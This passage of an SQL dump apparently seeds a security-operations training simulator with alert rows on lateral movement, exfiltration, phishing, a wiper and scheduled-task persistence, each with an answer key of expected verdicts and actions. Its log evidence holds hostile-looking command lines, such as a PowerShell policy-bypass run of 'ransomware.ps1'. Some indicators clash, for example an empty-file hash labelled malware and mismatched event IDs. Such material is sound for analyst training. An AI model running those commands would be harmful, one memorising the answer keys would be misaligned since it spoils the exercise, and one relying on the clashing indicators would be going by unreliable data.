C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\malicious_script.bat\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"user_sid\\\":\\\"S-1-5-21-123456789-1234567890-123456789-1001\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.15\\\",\\\"md5_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"sha256_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.815Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_id\\\":\\\"4698\\\",\\\"task_name\\\":\\\"\\\\\\\\IndigoZebra_MaintainAccess\\\",\\\"task_content\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe /c C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\malicious_script.bat\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"user_sid\\\":\\\"S-1-5-21-123456789-1234567890-123456789-1001\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.15\\\",\\\"md5_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"sha256_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.815Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_id\\\":\\\"4698\\\",\\\"task_name\\\":\\\"\\\\\\\\IndigoZebra_MaintainAccess\\\",\\\"task_content\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe /c C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\malicious_script.bat\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"user_sid\\\":\\\"S-1-5-21-123456789-1234567890-123456789-1001\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.15\\\",\\\"md5_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"sha256_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.815Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_id\\\":\\\"4698\\\",\\\"task_name\\\":\\\"\\\\\\\\IndigoZebra_MaintainAccess\\\",\\\"task_content\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe /c C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\malicious_script.bat\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"user_sid\\\":\\\"S-1-5-21-123456789-1234567890-123456789-1001\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.15\\\",\\\"md5_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"sha256_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.815Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_id\\\":\\\"4698\\\",\\\"task_name\\\":\\\"\\\\\\\\IndigoZebra_MaintainAccess\\\",\\\"task_content\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe /c C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\malicious_script.bat\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"user_sid\\\":\\\"S-1-5-21-123456789-1234567890-123456789-1001\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.15\\\",\\\"md5_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"sha256_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1328, 'Unauthorized Access to Internal Networks', 'high', 'Intrusion Detection Systems', 'An unauthorized lateral movement attempt was detected from a compromised internal host to critical systems within the network. The attacker is leveraging valid credentials to expand access.', 'Lateral Movement', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"source_ip\":\"192.168.1.100\",\"destination_ip\":\"10.1.1.12\",\"external_attacker_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"event_type\":\"authentication_attempt\",\"status\":\"success\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"malicious_payload.exe\",\"event_id\":\"4624\",\"message\":\"Successful login using compromised credentials detected.\",\"process\":\"svchost.exe\"}', '2026-03-01 22:55:55', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal source IP involved in unauthorized access attempt.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.1.12\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Targeted critical system within the network.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with previous attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware sample used for lateral movement.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"compromised\",\"details\":\"Compromised credentials used in the attack.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.818Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"source_ip\\\":\\\"192.168.1.100\\\",\\\"destination_ip\\\":\\\"10.1.1.12\\\",\\\"external_attacker_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"event_type\\\":\\\"authentication_attempt\\\",\\\"status\\\":\\\"success\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"malicious_payload.exe\\\",\\\"event_id\\\":\\\"4624\\\",\\\"message\\\":\\\"Successful login using compromised credentials detected.\\\",\\\"process\\\":\\\"svchost.exe\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.818Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"source_ip\\\":\\\"192.168.1.100\\\",\\\"destination_ip\\\":\\\"10.1.1.12\\\",\\\"external_attacker_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"event_type\\\":\\\"authentication_attempt\\\",\\\"status\\\":\\\"success\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"malicious_payload.exe\\\",\\\"event_id\\\":\\\"4624\\\",\\\"message\\\":\\\"Successful login using compromised credentials detected.\\\",\\\"process\\\":\\\"svchost.exe\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.818Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"source_ip\\\":\\\"192.168.1.100\\\",\\\"destination_ip\\\":\\\"10.1.1.12\\\",\\\"external_attacker_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"event_type\\\":\\\"authentication_attempt\\\",\\\"status\\\":\\\"success\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"malicious_payload.exe\\\",\\\"event_id\\\":\\\"4624\\\",\\\"message\\\":\\\"Successful login using compromised credentials detected.\\\",\\\"process\\\":\\\"svchost.exe\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.818Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"source_ip\\\":\\\"192.168.1.100\\\",\\\"destination_ip\\\":\\\"10.1.1.12\\\",\\\"external_attacker_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"event_type\\\":\\\"authentication_attempt\\\",\\\"status\\\":\\\"success\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"malicious_payload.exe\\\",\\\"event_id\\\":\\\"4624\\\",\\\"message\\\":\\\"Successful login using compromised credentials detected.\\\",\\\"process\\\":\\\"svchost.exe\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.818Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"source_ip\\\":\\\"192.168.1.100\\\",\\\"destination_ip\\\":\\\"10.1.1.12\\\",\\\"external_attacker_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"event_type\\\":\\\"authentication_attempt\\\",\\\"status\\\":\\\"success\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"malicious_payload.exe\\\",\\\"event_id\\\":\\\"4624\\\",\\\"message\\\":\\\"Successful login using compromised credentials detected.\\\",\\\"process\\\":\\\"svchost.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1329, 'Data Exfiltration via Encrypted Channels', 'high', 'Data Loss Prevention (DLP) Tools', 'IndigoZebra carried out the final stage of their operation, exfiltrating sensitive data using encrypted C2 channels. This activity was detected by our DLP tools, indicating the use of encrypted traffic to an external IP associated with known malicious activities.', 'Exfiltration', 'T1048', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:22:31Z\",\"event_id\":\"DLPE12345\",\"source_ip\":\"10.0.0.15\",\"destination_ip\":\"203.0.113.45\",\"protocol\":\"HTTPS\",\"data_volume\":\"15MB\",\"user\":\"jdoe\",\"filename\":\"sensitive_data.zip\",\"hash\":\"a1b2c3d4e5f67890123456789abcdef0\",\"action\":\"Data Exfiltration Detected\"}', '2026-03-01 22:55:55', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with IndigoZebra operations.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"a1b2c3d4e5f67890123456789abcdef0\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_db\",\"verdict\":\"malicious\",\"details\":\"File hash associated with data exfiltration malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"sensitive_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_analysis\",\"verdict\":\"suspicious\",\"details\":\"File involved in the data exfiltration attempt.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"user_db\",\"verdict\":\"internal\",\"details\":\"Username of the potentially compromised account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.820Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:22:31Z\\\",\\\"event_id\\\":\\\"DLPE12345\\\",\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"data_volume\\\":\\\"15MB\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"sensitive_data.zip\\\",\\\"hash\\\":\\\"a1b2c3d4e5f67890123456789abcdef0\\\",\\\"action\\\":\\\"Data Exfiltration Detected\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.820Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:22:31Z\\\",\\\"event_id\\\":\\\"DLPE12345\\\",\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"data_volume\\\":\\\"15MB\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"sensitive_data.zip\\\",\\\"hash\\\":\\\"a1b2c3d4e5f67890123456789abcdef0\\\",\\\"action\\\":\\\"Data Exfiltration Detected\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.820Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:22:31Z\\\",\\\"event_id\\\":\\\"DLPE12345\\\",\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"data_volume\\\":\\\"15MB\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"sensitive_data.zip\\\",\\\"hash\\\":\\\"a1b2c3d4e5f67890123456789abcdef0\\\",\\\"action\\\":\\\"Data Exfiltration Detected\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.820Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:22:31Z\\\",\\\"event_id\\\":\\\"DLPE12345\\\",\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"data_volume\\\":\\\"15MB\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"sensitive_data.zip\\\",\\\"hash\\\":\\\"a1b2c3d4e5f67890123456789abcdef0\\\",\\\"action\\\":\\\"Data Exfiltration Detected\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.820Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:22:31Z\\\",\\\"event_id\\\":\\\"DLPE12345\\\",\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"data_volume\\\":\\\"15MB\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"sensitive_data.zip\\\",\\\"hash\\\":\\\"a1b2c3d4e5f67890123456789abcdef0\\\",\\\"action\\\":\\\"Data Exfiltration Detected\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1330, 'Suspicious Phishing Email Detected', 'high', 'Email Gateway', 'A phishing email targeting key personnel in Israeli organizations has been detected. The email is suspected to have been sent by the Agrius APT group to harvest credentials. The email contains malicious links and attachments that urge the recipient to provide login information.', 'Initial Access', 'T1566 - Phishing', 1, 'new', NULL, '{\"timestamp\":\"2023-10-14T08:45:30Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.1.5\",\"sender_email\":\"alert@securemail.com\",\"recipient_email\":\"john.doe@israeli-org.org\",\"subject\":\"Urgent: Update Your Account Information\",\"attachment\":{\"filename\":\"SecureUpdate.docx\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"url\":\"http://malicious-update.com/securelogin\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\"}', '2026-03-01 22:56:26', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"IP associated with known phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"alert@securemail.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"suspicious\",\"details\":\"Domain recently registered and used in phishing activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malicious document used in phishing.\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"http://malicious-update.com/securelogin\",\"is_critical\":true,\"osint_result\":{\"source\":\"URL Analysis Service\",\"verdict\":\"malicious\",\"details\":\"URL hosting phishing landing page imitating legitimate service.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Phishing Email Detected\",\"date\":\"2026-03-02T13:55:06.822Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1331, 'Apostle Wiper Execution Attempt', 'high', 'Endpoint Detection and Response (EDR)', 'The Apostle malware was deployed attempting to execute under the guise of a ransomware attack. This is indicative of an Apostle wiper execution attempt, masquerading as ransomware.', 'Execution', 'T1059.001 - PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:35Z\",\"event_id\":\"4625\",\"source_ip\":\"185.230.150.45\",\"destination_ip\":\"192.168.1.15\",\"username\":\"compromised_user\",\"process_name\":\"powershell.exe\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\Temp\\\\ransomware.ps1\",\"file_hash\":\"3d2e479153a8f57f4f3b7e5c89f7a6e3c9b2f8d0\",\"filename\":\"ransomware.ps1\",\"action\":\"blocked\",\"severity\":\"high\"}', '2026-03-01 22:56:26', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.230.150.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known command and control server associated with Apostle malware.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host targeted by Apostle malware.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3d2e479153a8f57f4f3b7e5c89f7a6e3c9b2f8d0\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Lab\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Apostle wiper variant.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"ransomware.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"File masquerading as ransomware, used by Apostle wiper.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"User account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1332, 'Persistence Mechanism Detected', 'high', 'System Logs', 'Agrius has established a persistent backdoor using scheduled tasks and registry modifications on the host machine. This action aims to maintain access over an extended period.', 'Persistence', 'T1053.005 - Scheduled Task/Job', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:35:20Z\",\"event_id\":\"4624\",\"log_source\":\"Windows Security Log\",\"user\":\"malicious_user\",\"action\":\"Scheduled Task Creation\",\"task_name\":\"\\\\Microsoft\\\\Windows\\\\Update\\\\CriticalUpdate\",\"command\":\"C:\\\\Windows\\\\System32\\\\wscript.exe C:\\\\Users\\\\Public\\\\update.js\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"registry_modification\":\"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\MaliciousEntry\",\"source_ip\":\"45.76.23.89\",\"affected_host_ip\":\"192.168.1.102\"}', '2026-03-01 22:56:26', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"45.76.23.89\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known command and control server associated with Agrius.\"}},{\"id\":\"artifact_2\",\"type\":\"filename\",\"value\":\"update.js\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Script used for establishing persistence.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"SHA256 Lookup\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to known Agrius malware variant.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"malicious_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Security Database\",\"verdict\":\"suspicious\",\"details\":\"User account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.824Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:35:20Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"log_source\\\":\\\"Windows Security Log\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"action\\\":\\\"Scheduled Task Creation\\\",\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Update\\\\\\\\CriticalUpdate\\\",\\\"command\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wscript.exe C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\update.js\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"registry_modification\\\":\\\"HKCU\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousEntry\\\",\\\"source_ip\\\":\\\"45.76.23.89\\\",\\\"affected_host_ip\\\":\\\"192.168.1.102\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.824Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:35:20Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"log_source\\\":\\\"Windows Security Log\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"action\\\":\\\"Scheduled Task Creation\\\",\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Update\\\\\\\\CriticalUpdate\\\",\\\"command\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wscript.exe C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\update.js\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"registry_modification\\\":\\\"HKCU\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousEntry\\\",\\\"source_ip\\\":\\\"45.76.23.89\\\",\\\"affected_host_ip\\\":\\\"192.168.1.102\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.824Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:35:20Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"log_source\\\":\\\"Windows Security Log\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"action\\\":\\\"Scheduled Task 